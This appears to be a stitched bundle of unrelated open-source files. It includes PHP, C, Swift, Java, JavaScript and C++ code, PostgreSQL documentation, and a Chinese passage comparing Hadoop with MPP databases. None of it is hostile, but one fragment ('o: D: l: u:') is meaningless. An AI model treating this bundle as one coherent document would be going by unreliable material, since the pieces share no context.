* Value Object representing a Compound Type.
*
* A Compound Type is not so much a special keyword or object reference but is a series of Types that are separated
* using an OR operator (`|`). This combination of types signifies that whatever is associated with this compound type
* may contain a value with any of the given types.
*/
final class Compound implements Type, IteratorAggregate
{
/** @var Type[] */
private $types;
/**
* Initializes a compound type (i.e. `string|int`) and tests if the provided types all implement the Type interface.
*
* @param Type[] $types
* @throws \InvalidArgumentException when types are not all instance of Type
*/
public function __construct(array $types)
{
foreach ($types as $type) {
if (!$type instanceof Type) {
throw new \InvalidArgumentException('A compound type can only have other types as elements');
}
}
$this->types = $types;
}
/**
* Returns the type at the given index.
*
* @param integer $index
*
* @return Type|null
*/
public function get($index)
{
if (!$this->has($index)) {
return null;
}
return $this->types[$index];
}
/**
* Tests if this compound type has a type with the given index.
*
* @param integer $index
*
* @return bool
*/
public function has($index)
{
return isset($this->types[$index]);
}
/**
* Returns a rendered output of the Type as it would be used in a DocBlock.
*
* @return string
*/
public function __toString()
{
return implode('|', $this->types);
}
/**
* {@inheritdoc}
*/
public function getIterator()
{
return new ArrayIterator($this->types);
}
}
| {
"pile_set_name": "Github"
} |
// Copyright 2015 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build gccgo
// +build !aix
#include <errno.h>
#include <stdint.h>
#include <unistd.h>
#define _STRINGIFY2_(x) #x
#define _STRINGIFY_(x) _STRINGIFY2_(x)
#define GOSYM_PREFIX _STRINGIFY_(__USER_LABEL_PREFIX__)
// Call syscall from C code because the gccgo support for calling from
// Go to C does not support varargs functions.
struct ret {
uintptr_t r;
uintptr_t err;
};
struct ret
gccgoRealSyscall(uintptr_t trap, uintptr_t a1, uintptr_t a2, uintptr_t a3, uintptr_t a4, uintptr_t a5, uintptr_t a6, uintptr_t a7, uintptr_t a8, uintptr_t a9)
{
struct ret r;
errno = 0;
r.r = syscall(trap, a1, a2, a3, a4, a5, a6, a7, a8, a9);
r.err = errno;
return r;
}
uintptr_t
gccgoRealSyscallNoError(uintptr_t trap, uintptr_t a1, uintptr_t a2, uintptr_t a3, uintptr_t a4, uintptr_t a5, uintptr_t a6, uintptr_t a7, uintptr_t a8, uintptr_t a9)
{
return syscall(trap, a1, a2, a3, a4, a5, a6, a7, a8, a9);
}
| {
"pile_set_name": "Github"
} |
<html>
<head>
<title>Map test page</title>
</head>
<body>
<div style="position: absolute; left: 0px; top: 0px; z-index: 106;"><img style="position: absolute; left: 271px; top: 320px; width: 20px; height: 34px; -moz-user-select: none; border: 0px none; padding: 0px; margin: 0px; z-index: -140270496;" src="markerTransparent.png" class="gmnoprint" usemap="#gmimap0"><map name="gmimap0" id="gmimap0"><area log="miw" coords="9,0,6,1,4,2,2,4,0,8,0,12,1,14,2,16,5,19,7,23,8,26,9,30,9,34,11,34,11,30,12,26,13,24,14,21,16,18,18,16,20,12,20,8,18,4,16,2,15,1,13,0" shape="poly" alt="" href="javascript:void(0)" id="mtgt_unnamed_0" style="position: absolute; left: 159px; top: 342px;"></map></div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2017 by frePPLe bv
*
* This library is free software; you can redistribute it and/or modify it
* under the terms of the GNU Affero General Public License as published
* by the Free Software Foundation; either version 3 of the License, or
* (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero
* General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public
* License along with this program. If not, see <http://www.gnu.org/licenses/>.
*
*/
angular.module("frepple.common", []);
// Global variable database is passed from Django.
angular.module("frepple.common")
.constant('getURLprefix', function getURLprefix() {
return database === 'default' ? '' : '/' + database;
}
);
// Date formatting filter, expecting a moment instance as input
angular.module("frepple.common")
.filter('dateTimeFormat', function dateTimeFormat() {
return function (input, fmt) {
fmt = fmt || 'YYYY-MM-DD HH:mm:ss';
return input ? input.format(fmt) : '';
};
});
| {
"pile_set_name": "Github"
} |
o:
D:
D:
2:
D:
l:
D:
u: | {
"pile_set_name": "Github"
} |
//
// Umbrella.swift
// RainyRefresh
//
// Created by Anton Dolzhenko on 16.11.16.
// Copyright © 2016 Onix Systems. All rights reserved.
//
import UIKit
enum UmbrellaState {
case closed
case opened
var value: CGFloat {
return (self == .opened) ? 0.0 : 1.0
}
}
final class UmbrellaView:UIView {
var lineWidth:CGFloat = 1.0
var strokeColor: UIColor = .white
private(set) var state = UmbrellaState.closed
private var animationValue: CGFloat {
set {
if let layer = layer as? UmbrellaLayer {
layer.animationValue = newValue
}
}
get {
if let layer = layer as? UmbrellaLayer {
return layer.animationValue
}
return 0.0
}
}
override class var layerClass : AnyClass {
return UmbrellaLayer.self
}
override init(frame: CGRect) {
super.init(frame: frame)
if let layer = layer as? UmbrellaLayer {
layer.contentsScale = UIScreen.main.scale
layer.lineWidth = lineWidth
layer.strokeColor = strokeColor
}
animationValue = 1
}
required init?(coder aDecoder: NSCoder) {
super.init(coder: aDecoder)
}
// MARK: - Methods
func setButtonState(state: UmbrellaState, animated: Bool) {
if self.state == state {
return
}
self.state = state
let toValue: CGFloat = state.value
if animated {
UIView.animate(withDuration: 0.25, animations: {
self.animationValue = toValue
})
} else {
animationValue = toValue
}
}
}
final class UmbrellaLayer:CALayer {
@NSManaged var animationValue: CGFloat
var lineWidth:CGFloat = 1.0
var strokeColor:UIColor = .white
private var APoint:CGPoint!
private var aPoint:CGPoint!
private var a1Point:CGPoint!
private var BPoint:CGPoint!
private var bPoint:CGPoint!
private var b1Point:CGPoint!
private var CPoint:CGPoint!
private var cPoint:CGPoint!
private var DPoint:CGPoint!
private var dPoint:CGPoint!
private var d1Point:CGPoint!
private var EPoint:CGPoint!
private var ePoint:CGPoint!
private var e1Point:CGPoint!
private var FPoint:CGPoint!
fileprivate class func isCustomAnimKey(_ key: String) -> Bool {
return key == "animationValue"
}
override class func needsDisplay(forKey key: String) -> Bool {
if self.isCustomAnimKey(key) {
return true
}
return super.needsDisplay(forKey: key)
}
override func action(forKey event: String) -> CAAction? {
if UmbrellaLayer.isCustomAnimKey(event) {
if let animation = super.action(forKey: "backgroundColor") as? CABasicAnimation {
animation.keyPath = event
if let pLayer = presentation() {
animation.fromValue = pLayer.animationValue
}
animation.toValue = nil
return animation
}
setNeedsDisplay()
return nil
}
return super.action(forKey: event)
}
func update() {
let midX = bounds.midX
let midY = bounds.midY
let width = bounds.width
let height = bounds.height
APoint = CGPoint(x: (midX-width*0.4133)+(width*0.3633*animationValue), y: (midY+0.055*height)+(height*0.0683*animationValue))
aPoint = CGPoint(x: (midX-width*0.385)+(width*0.3366*animationValue), y: (midY-height*0.3716)-(height*0.0016*animationValue))
a1Point = CGPoint(x: (midX-width*0.3033)+(width*0.265*animationValue), y: (midY-height*0.1166)+(height*0.07*animationValue))
BPoint = CGPoint(x: (midX-width*0.2033)+(width*0.1783*animationValue), y: (midY+height*0.0433)+(height*0.0783*animationValue))
bPoint = CGPoint(x: (midX-width*0.2233)+(width*0.1957*animationValue), y: (midY-height*0.295)+(height*0.0129*animationValue))
b1Point = CGPoint(x: (midX-width*0.0892)+(width*0.0792*animationValue), y: (midY-height*0.105)+(height*0.105*animationValue))
CPoint = CGPoint(x: midX, y: (midY+height*0.0433)+(height*0.0783*animationValue))
DPoint = CGPoint(x: (midX+width*0.2033)-(width*0.1783*animationValue), y: (midY+height*0.0433)+(height*0.0783*animationValue))
dPoint = CGPoint(x: (midX+width*0.2175)-(width*0.1908*animationValue), y: (midY-height*0.295)+(height*0.0129*animationValue))
d1Point = CGPoint(x: (midX+width*0.0894)-(width*0.0778*animationValue), y:(midY-height*0.105)+(height*0.105*animationValue))
EPoint = CGPoint(x: (midX+width*0.4133)-(width*0.3633*animationValue), y: (midY+height*0.0566)+(height*0.0666*animationValue))
ePoint = CGPoint(x: (midX+width*0.385)-(width*0.3366*animationValue), y: (midY-height*0.375)+(height*0.0016*animationValue))
e1Point = CGPoint(x: (midX+width*0.3116)-(width*0.2733*animationValue), y: (midY-height*0.1091)+(height*0.0625*animationValue))
FPoint = CGPoint(x: midX, y: (midY-height*0.3683)-(0.0016*animationValue))
}
override func draw(in ctx: CGContext) {
super.draw(in: ctx)
ctx.setStrokeColor(strokeColor.cgColor)
ctx.setLineWidth(lineWidth)
update()
//// Draw a handle
let bezierPath = UIBezierPath()
bezierPath.move(to: CGPoint(x: bounds.midX, y: bounds.midY+bounds.height*0.4266))
bezierPath.addLine(to: CGPoint(x: bounds.midX, y: bounds.midY-bounds.height*0.415))
let arrayOfDots:[(CGPoint,CGPoint,CGPoint,CGPoint)] = [(APoint,FPoint,aPoint,FPoint),
(FPoint,EPoint,FPoint,ePoint),
(BPoint,FPoint,bPoint,FPoint),
(APoint,BPoint,a1Point,BPoint),
(BPoint,CPoint,b1Point,CPoint),
(DPoint,CPoint,d1Point,CPoint),
(FPoint,DPoint,FPoint,dPoint),
(DPoint,EPoint,DPoint,e1Point)]
arrayOfDots.forEach { (a,b,c,d) in
bezierPath.move(to: a)
bezierPath.addCurve(to: b, controlPoint1: c, controlPoint2: d)
}
ctx.addPath(bezierPath.cgPath)
ctx.setLineCap(.round)
ctx.strokePath()
}
}
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.servicecomb.service.center.client.model;
public class GetSchemaResponse {
private String schema;
public String getSchema() {
return schema;
}
public void setSchema(String schema) {
this.schema = schema;
}
}
| {
"pile_set_name": "Github"
} |
<!--
doc/src/sgml/ref/security_label.sgml
PostgreSQL documentation
-->
<refentry id="SQL-SECURITY-LABEL">
<refmeta>
<refentrytitle>SECURITY LABEL</refentrytitle>
<manvolnum>7</manvolnum>
<refmiscinfo>SQL - Language Statements</refmiscinfo>
</refmeta>
<refnamediv>
<refname>SECURITY LABEL</refname>
<refpurpose>define or change a security label applied to an object</refpurpose>
</refnamediv>
<indexterm zone="sql-security-label">
<primary>SECURITY LABEL</primary>
</indexterm>
<refsynopsisdiv>
<synopsis>
SECURITY LABEL [ FOR <replaceable class="PARAMETER">provider</replaceable> ] ON
{
TABLE <replaceable class="PARAMETER">object_name</replaceable> |
COLUMN <replaceable class="PARAMETER">table_name</replaceable>.<replaceable class="PARAMETER">column_name</replaceable> |
AGGREGATE <replaceable class="PARAMETER">agg_name</replaceable> (<replaceable class="PARAMETER">agg_type</replaceable> [, ...] ) |
DATABASE <replaceable class="PARAMETER">object_name</replaceable> |
DOMAIN <replaceable class="PARAMETER">object_name</replaceable> |
FOREIGN TABLE <replaceable class="PARAMETER">object_name</replaceable>
FUNCTION <replaceable class="PARAMETER">function_name</replaceable> ( [ [ <replaceable class="parameter">argmode</replaceable> ] [ <replaceable class="parameter">argname</replaceable> ] <replaceable class="parameter">argtype</replaceable> [, ...] ] ) |
LARGE OBJECT <replaceable class="PARAMETER">large_object_oid</replaceable> |
[ PROCEDURAL ] LANGUAGE <replaceable class="PARAMETER">object_name</replaceable> |
ROLE <replaceable class="PARAMETER">object_name</replaceable> |
SCHEMA <replaceable class="PARAMETER">object_name</replaceable> |
SEQUENCE <replaceable class="PARAMETER">object_name</replaceable> |
TABLESPACE <replaceable class="PARAMETER">object_name</replaceable> |
TYPE <replaceable class="PARAMETER">object_name</replaceable> |
VIEW <replaceable class="PARAMETER">object_name</replaceable>
} IS '<replaceable class="PARAMETER">label</replaceable>'
</synopsis>
</refsynopsisdiv>
<refsect1>
<title>Description</title>
<para>
<command>SECURITY LABEL</command> applies a security label to a database
object. An arbitrary number of security labels, one per label provider, can
be associated with a given database object. Label providers are loadable
modules which register themselves by using the function
<function>register_label_provider</>.
</para>
<note>
<para>
<function>register_label_provider</> is not an SQL function; it can
only be called from C code loaded into the backend.
</para>
</note>
<para>
The label provider determines whether a given label is valid and whether
it is permissible to assign that label to a given object. The meaning of a
given label is likewise at the discretion of the label provider.
<productname>PostgreSQL</> places no restrictions on whether or how a
label provider must interpret security labels; it merely provides a
mechanism for storing them. In practice, this facility is intended to allow
integration with label-based mandatory access control (MAC) systems such as
<productname>SE-Linux</>. Such systems make all access control decisions
based on object labels, rather than traditional discretionary access control
(DAC) concepts such as users and groups.
</para>
</refsect1>
<refsect1>
<title>Parameters</title>
<variablelist>
<varlistentry>
<term><replaceable class="parameter">object_name</replaceable></term>
<term><replaceable class="parameter">table_name.column_name</replaceable></term>
<term><replaceable class="parameter">agg_name</replaceable></term>
<term><replaceable class="parameter">function_name</replaceable></term>
<listitem>
<para>
The name of the object to be labeled. Names of tables,
aggregates, domains, foreign tables, functions, sequences, types, and
views can be schema-qualified.
</para>
</listitem>
</varlistentry>
<varlistentry>
<term><replaceable class="parameter">provider</replaceable></term>
<listitem>
<para>
The name of the provider with which this label is to be associated. The
named provider must be loaded and must consent to the proposed labeling
operation. If exactly one provider is loaded, the provider name may be
omitted for brevity.
</para>
</listitem>
</varlistentry>
<varlistentry>
<term><replaceable class="parameter">arg_type</replaceable></term>
<listitem>
<para>
An input data type on which the aggregate function operates.
To reference a zero-argument aggregate function, write <literal>*</>
in place of the list of input data types.
</para>
</listitem>
</varlistentry>
<varlistentry>
<term><replaceable class="parameter">argmode</replaceable></term>
<listitem>
<para>
The mode of a function argument: <literal>IN</>, <literal>OUT</>,
<literal>INOUT</>, or <literal>VARIADIC</>.
If omitted, the default is <literal>IN</>.
Note that <command>SECURITY LABEL ON FUNCTION</command> does not actually
pay any attention to <literal>OUT</> arguments, since only the input
arguments are needed to determine the function's identity.
So it is sufficient to list the <literal>IN</>, <literal>INOUT</>,
and <literal>VARIADIC</> arguments.
</para>
</listitem>
</varlistentry>
<varlistentry>
<term><replaceable class="parameter">argname</replaceable></term>
<listitem>
<para>
The name of a function argument.
Note that <command>SECURITY LABEL ON FUNCTION</command> does not actually
pay any attention to argument names, since only the argument data
types are needed to determine the function's identity.
</para>
</listitem>
</varlistentry>
<varlistentry>
<term><replaceable class="parameter">argtype</replaceable></term>
<listitem>
<para>
The data type(s) of the function's arguments (optionally
schema-qualified), if any.
</para>
</listitem>
</varlistentry>
<varlistentry>
<term><replaceable class="parameter">large_object_oid</replaceable></term>
<listitem>
<para>
The OID of the large object.
</para>
</listitem>
</varlistentry>
<varlistentry>
<term><literal>PROCEDURAL</literal></term>
<listitem>
<para>
This is a noise word.
</para>
</listitem>
</varlistentry>
<varlistentry>
<term><replaceable class="parameter">label</replaceable></term>
<listitem>
<para>
The new security label, written as a string literal; or <literal>NULL</>
to drop the security label.
</para>
</listitem>
</varlistentry>
</variablelist>
</refsect1>
<refsect1>
<title>Examples</title>
<para>
The following example shows how the security label of a table might
be changed.
<programlisting>
SECURITY LABEL FOR selinux ON TABLE mytable IS 'system_u:object_r:sepgsql_table_t:s0';
</programlisting></para>
</refsect1>
<refsect1>
<title>Compatibility</title>
<para>
There is no <command>SECURITY LABEL</command> command in the SQL standard.
</para>
</refsect1>
<refsect1>
<title>See Also</title>
<simplelist type="inline">
<member><xref linkend="sepgsql"></member>
<member><xref linkend="dummy-seclabel"></member>
</simplelist>
</refsect1>
</refentry>
| {
"pile_set_name": "Github"
} |
<?php
/**
* li₃: the most RAD framework for PHP (http://li3.me)
*
* Copyright 2009, Union of RAD. All rights reserved. This source
* code is distributed under the terms of the BSD 3-Clause License.
* The full license text can be found in the LICENSE.txt file.
*/
namespace lithium\data;
use lithium\core\Libraries;
/**
* The `Connections` class manages a list of named configurations that connect to external
* resources. Connections are usually comprised of a type (i.e. `'database'` or `'http'`), a
* reference to an adapter class (i.e. `'MySql'` or `'CouchDb'`), and authentication credentials.
*
* While connections can be added and removed dynamically during the course of your application
* (using `Connections::add()`), it is most typical to define all connections at once, in
* `config/bootstrap/connections.php`.
*
* The `Connections` class handles adapter classes efficiently by only loading adapter classes and
* creating instances when they are requested (using `Connections::get()`).
*
* Adapters are usually subclasses of `lithium\data\Source`.
*
* @see lithium\data\Source
*/
class Connections extends \lithium\core\Adaptable {
/**
* A Collection of the configurations you add through Connections::add().
*
* @var `lithium\util\Collection`
*/
protected static $_configurations = [];
/**
* Libraries::locate() compatible path to adapters for this class.
*
* @var string Dot-delimited path.
*/
protected static $_adapters = 'data.source';
/**
* Add connection configurations to your app in `config/bootstrap/connections.php`
*
* For example:
* ```
* Connections::add('default', [
* 'type' => 'database',
* 'adapter' => 'MySql',
* 'host' => 'localhost',
* 'login' => 'root',
* 'password' => '',
* 'database' => 'my_blog'
* ]);
* ```
*
* or
*
* ```
* Connections::add('couch', [
* 'type' => 'http',
* 'adapter' => 'CouchDb',
* 'host' => '127.0.0.1',
* 'port' => 5984
* ]);
* ```
*
* or
*
* ```
* Connections::add('mongo', [
* 'type' => 'MongoDb',
* 'database' => 'my_app'
* ]);
* ```
*
* @see lithium\data\Model::$_meta
* @param string $name The name by which this connection is referenced. Use this name to
* retrieve the connection again using `Connections::get()`, or to bind a model to it
* using `Model::$_meta['connection']`.
* @param array $config Contains all additional configuration information used by the
* connection, including the name of the adapter class where applicable (i.e. `MySql`),
* and typcially the server host/socket to connect to, the name of the database or
* other entity to use. Each adapter has its own specific configuration settings for
* handling things like connection persistence, data encoding, etc. See the
* individual adapter or data source class for more information on what configuration
* settings it supports. Basic / required options supported are:
* - `'type'` _string_: The type of data source that defines this connection; typically a
* class or namespace name. Relational database data sources, use `'database'`, while
* CouchDB and other HTTP-related data sources use `'http'`, etc. For classes which
* directly extend `lithium\data\Source`, and do not use an adapter, simply use the
* name of the class, i.e. `'MongoDb'`.
* - `'adapter'` _string_: For `type`s such as `'database'` which are adapter-driven,
* provides the name of the adapter associated with this configuration.
* @return array Returns the final post-processed connection information, as stored in the
* internal configuration array used by `Connections`.
*/
public static function add($name, array $config = []) {
$defaults = [
'type' => null,
'adapter' => null
];
return static::$_configurations[$name] = $config + $defaults;
}
/**
* Removing a configuration.
*
* @param string $name The name by which this connection is referenced.
*/
public static function remove($name) {
unset(static::$_configurations[$name]);
}
/**
* Read the configuration or access the connections you have set up.
*
* Usage:
* ```
* // Gets the names of all available configurations
* $configurations = Connections::get();
*
* // Gets the configuration array for the connection named 'db'
* $config = Connections::get('db', ['config' => true]);
*
* // Gets the instance of the connection object, configured with the settings defined for
* // this object in Connections::add()
* $dbConnection = Connections::get('db');
*
* // Gets the connection object, but only if it has already been built.
* // Otherwise returns null.
* $dbConnection = Connections::get('db', ['autoCreate' => false]);
* ```
*
* @param string $name The name of the connection to get, as defined in the first parameter of
* `add()`, when the connection was initially created.
* @param array $options Options to use when returning the connection:
* - `'autoCreate'`: If `false`, the connection object is only returned if it has
* already been instantiated by a previous call.
* - `'config'`: If `true`, returns an array representing the connection's internal
* configuration, instead of the connection itself.
* @return mixed A configured instance of the connection, or an array of the configuration used.
*/
public static function get($name = null, array $options = []) {
static $mockAdapter;
$defaults = ['config' => false, 'autoCreate' => true];
$options += $defaults;
if ($name === false) {
if (!$mockAdapter) {
$class = Libraries::locate('data.source', 'Mock');
$mockAdapter = new $class();
}
return $mockAdapter;
}
if (!$name) {
return array_keys(static::$_configurations);
}
if (!isset(static::$_configurations[$name])) {
return null;
}
if ($options['config']) {
return static::_config($name);
}
$settings = static::$_configurations[$name];
if (!isset($settings[0]['object']) && !$options['autoCreate']) {
return null;
}
return static::adapter($name);
}
/**
* Constructs a data source or adapter object instance from a configuration array.
*
* @param array $config
* @param array $paths
* @return object
*/
protected static function _class($config, $paths = []) {
if (!$config['adapter']) {
$config['adapter'] = $config['type'];
} else {
$paths = array_merge(["adapter.data.source.{$config['type']}"], (array) $paths);
}
return parent::_class($config, $paths);
}
}
?> | {
"pile_set_name": "Github"
} |
// (C) Copyright Dave Abrahams, Steve Cleary, Beman Dawes, Howard
// Hinnant & John Maddock 2000.
// Use, modification and distribution are subject to the Boost Software License,
// Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt).
//
// See http://www.boost.org/libs/type_traits for most recent version including documentation.
#ifndef BOOST_TT_REMOVE_CONST_HPP_INCLUDED
#define BOOST_TT_REMOVE_CONST_HPP_INCLUDED
#include <boost/config.hpp>
#include <cstddef>
#include <boost/detail/workaround.hpp>
namespace boost {
// convert a type T to a non-cv-qualified type - remove_const<T>
template <class T> struct remove_const{ typedef T type; };
template <class T> struct remove_const<T const>{ typedef T type; };
#if !defined(BOOST_NO_ARRAY_TYPE_SPECIALIZATIONS)
template <class T, std::size_t N> struct remove_const<T const[N]>{ typedef T type[N]; };
#if !BOOST_WORKAROUND(__BORLANDC__, < 0x600) && !defined(__IBMCPP__) && !BOOST_WORKAROUND(__DMC__, BOOST_TESTED_AT(0x840))
template <class T> struct remove_const<T const[]>{ typedef T type[]; };
#endif
#endif
} // namespace boost
#endif // BOOST_TT_REMOVE_CONST_HPP_INCLUDED
| {
"pile_set_name": "Github"
} |
/*
* Based on nios2-generic.c:
* (C) Copyright 2005, Psyent Corporation <www.psyent.com>
* Scott McNutt <[email protected]>
* (C) Copyright 2010, Thomas Chou <[email protected]>
*
* SPDX-License-Identifier: GPL-2.0+
*/
#include <common.h>
#include <netdev.h>
int board_early_init_f(void)
{
return 0;
}
int checkboard(void)
{
printf("BOARD: %s\n", CONFIG_BOARD_NAME);
return 0;
}
phys_size_t initdram(int board_type)
{
return 0;
}
#ifdef CONFIG_CMD_NET
int board_eth_init(bd_t *bis)
{
int rc = 0;
#ifdef CONFIG_ETHOC
rc += ethoc_initialize(0, CONFIG_SYS_ETHOC_BASE);
#endif
return rc;
}
#endif
| {
"pile_set_name": "Github"
} |
import { equal } from 'assert';
import curry from '../curry';
import reduce from '../reduce';
import compose from '../compose';
test('#curry', () => {
const f = (a, b) => a + b;
equal(curry(f)(1)(2), 3);
const g = (a, b, c) => a + b + c;
equal(
curry(g)(1)(2, 3),
6
);
equal(
curry(g)(1, 2)(3),
6
);
const curry3 = compose(curry, curry);
equal(
curry3(g)(1)(2)(3),
6
);
const h = (a, b, c, d) => a + b + c + d;
const curry4 = reduce(compose, [curry, curry, curry]);
equal(
curry4(h)(1)(2)(3)(4),
10
);
});
| {
"pile_set_name": "Github"
} |
//------------------------------------------------------------------------------
// GB_assign_zombie5: delete entries in C for C_replace_phase
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2020, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
// For GrB_Matrix_assign, C(I,J)<M,repl>=..., if C_replace is true, and mask M
// is present, then any entry C(i,j) outside IxJ must be be deleted, if
// M(i,j)=0.
// See also GB_assign_zombie3 and GB_assign_zombie4.
#include "GB_assign.h"
#include "GB_ek_slice.h"
#define GB_FREE_WORK \
GB_ek_slice_free (&pstart_slice, &kfirst_slice, &klast_slice, ntasks) ;
GrB_Info GB_assign_zombie5
(
GrB_Matrix Z, // the matrix C, or a copy
const GrB_Matrix M,
const bool Mask_comp,
const bool Mask_struct,
const GrB_Index *I,
const int64_t nI,
const int Ikind,
const int64_t Icolon [3],
const GrB_Index *J,
const int64_t nJ,
const int Jkind,
const int64_t Jcolon [3],
GB_Context Context
)
{
//--------------------------------------------------------------------------
// get Z
//--------------------------------------------------------------------------
const int64_t *GB_RESTRICT Zh = Z->h ;
const int64_t *GB_RESTRICT Zp = Z->p ;
// const int64_t Znvec = Z->nvec ;
int64_t *GB_RESTRICT Zi = Z->i ;
int64_t nzombies = Z->nzombies ;
const int64_t znz = GB_NNZ (Z) ;
//--------------------------------------------------------------------------
// get M
//--------------------------------------------------------------------------
const int64_t *GB_RESTRICT Mh = M->h ;
const int64_t *GB_RESTRICT Mp = M->p ;
const int64_t *GB_RESTRICT Mi = M->i ;
const GB_void *GB_RESTRICT Mx = (Mask_struct ? NULL : (M->x)) ;
const size_t msize = M->type->size ;
const int64_t Mnvec = M->nvec ;
const bool M_is_hyper = M->is_hyper ;
//--------------------------------------------------------------------------
// determine the number of threads to use
//--------------------------------------------------------------------------
GB_GET_NTHREADS_MAX (nthreads_max, chunk, Context) ;
int nthreads = GB_nthreads (znz, chunk, nthreads_max) ;
int ntasks = (nthreads == 1) ? 1 : (64 * nthreads) ;
ntasks = GB_IMIN (ntasks, znz) ;
ntasks = GB_IMAX (ntasks, 1) ;
//--------------------------------------------------------------------------
// slice the entries for each task
//--------------------------------------------------------------------------
// Task tid does entries pstart_slice [tid] to pstart_slice [tid+1]-1 and
// vectors kfirst_slice [tid] to klast_slice [tid]. The first and last
// vectors may be shared with prior slices and subsequent slices.
int64_t *pstart_slice = NULL, *kfirst_slice = NULL, *klast_slice = NULL ;
if (!GB_ek_slice (&pstart_slice, &kfirst_slice, &klast_slice, Z, ntasks))
{
// out of memory
return (GB_OUT_OF_MEMORY) ;
}
//--------------------------------------------------------------------------
// each task creates its own zombies
//--------------------------------------------------------------------------
int tid ;
#pragma omp parallel for num_threads(nthreads) schedule(dynamic,1) \
reduction(+:nzombies)
for (tid = 0 ; tid < ntasks ; tid++)
{
//----------------------------------------------------------------------
// get the task description
//----------------------------------------------------------------------
int64_t kfirst = kfirst_slice [tid] ;
int64_t klast = klast_slice [tid] ;
//----------------------------------------------------------------------
// scan vectors kfirst to klast for entries to delete
//----------------------------------------------------------------------
for (int64_t k = kfirst ; k <= klast ; k++)
{
//------------------------------------------------------------------
// get Z(:,j) and determine if j is outside the list J
//------------------------------------------------------------------
int64_t j = (Zh == NULL) ? k : Zh [k] ;
// j_outside is true if column j is outside the Z(I,J) submatrix
bool j_outside = !GB_ij_is_in_list (J, nJ, j, Jkind, Jcolon) ;
int64_t pZ_start, pZ_end ;
GB_get_pA_and_pC (&pZ_start, &pZ_end, NULL,
tid, k, kfirst, klast, pstart_slice, NULL, NULL, Zp) ;
//------------------------------------------------------------------
// get M(:,j)
//------------------------------------------------------------------
int64_t pM_start, pM_end ;
int64_t pleft = 0 ;
int64_t pright = Mnvec - 1 ;
GB_lookup (M_is_hyper, Mh, Mp, &pleft, pright, j,
&pM_start, &pM_end) ;
//------------------------------------------------------------------
// iterate over all entries in Z(:,j)
//------------------------------------------------------------------
for (int64_t pZ = pZ_start ; pZ < pZ_end ; pZ++)
{
//--------------------------------------------------------------
// consider Z(i,j)
//--------------------------------------------------------------
// Z(i,j) is outside the Z(I,J) submatrix if either i is
// not in the list I, or j is not in J, or both.
int64_t i = Zi [pZ] ;
if (!GB_IS_ZOMBIE (i) &&
(j_outside || !GB_ij_is_in_list (I, nI, i, Ikind, Icolon)))
{
//----------------------------------------------------------
// Z(i,j) is a live entry not in the Z(I,J) submatrix
//----------------------------------------------------------
// Check the mask M to see if it should be deleted.
int64_t pM = pM_start ;
int64_t pright = pM_end - 1 ;
bool found ;
GB_BINARY_SEARCH (i, Mi, pM, pright, found) ;
bool mij = false ;
if (found)
{
// found it
mij = GB_mcast (Mx, pM, msize) ;
}
if (Mask_comp)
{
// negate the mask if Mask_comp is true
mij = !mij ;
}
if (!mij)
{
// delete Z(i,j) by marking it as a zombie
nzombies++ ;
Zi [pZ] = GB_FLIP (i) ;
}
}
}
}
}
//--------------------------------------------------------------------------
// free workspace and return result
//--------------------------------------------------------------------------
Z->nzombies = nzombies ;
GB_FREE_WORK ;
return (GrB_SUCCESS) ;
}
| {
"pile_set_name": "Github"
} |
# Hadoop 与分布式数据库对比
正如我们所看到的,Hadoop 有点像 Unix 的分布式版本,其中 HDFS 是文件系统,而 MapReduce 是 Unix 进程的怪异实现(总是在 Map 阶段和 Reduce 阶段运行 sort 工具)。我们了解了如何在这些原语的基础上实现各种连接和分组操作。当 MapReduce 论文发表时,它从某种意义上来说:并不新鲜。我们在前几节中讨论的所有处理和并行连接算法已经在十多年前所谓的**大规模并行处理(MPP,massively parallel processing)**数据库中实现了。比如 Gamma database machine,Teradata 和 Tandem NonStop SQL 就是这方面的先驱。
最大的区别是,MPP 数据库专注于在一组机器上并行执行分析 SQL 查询,而 MapReduce 和分布式文件系统的组合则更像是一个可以运行任意程序的通用操作系统。
# 存储多样性
数据库要求你根据特定的模型(例如关系或文档)来构造数据,而分布式文件系统中的文件只是字节序列,可以使用任何数据模型和编码来编写。它们可能是数据库记录的集合,但同样可以是文本,图像,视频,传感器读数,稀疏矩阵,特征向量,基因组序列或任何其他类型的数据。说白了,Hadoop 开放了将数据不加区分地转储到 HDFS 的可能性,允许后续再研究如何进一步处理。相比之下,在将数据导入数据库专有存储格式之前,MPP 数据库通常需要对数据和查询模式进行仔细的前期建模。在纯粹主义者看来,这种仔细的建模和导入似乎是可取的,因为这意味着数据库的用户有更高质量的数据来处理。然而实践经验表明,简单地使数据快速可用:即使它很古怪,难以使用,使用原始格式:也通常要比事先决定理想数据模型要更有价值。
这个想法与数据仓库类似:将大型组织的各个部分的数据集中在一起是很有价值的,因为它可以跨越以前相分离的数据集进行连接。MPP 数据库所要求的谨慎模式设计拖慢了集中式数据收集速度;以原始形式收集数据,稍后再操心模式的设计,能使数据收集速度加快(有时被称为“数据湖(data lake)”或“企业数据中心(enterprise data hub)”)。
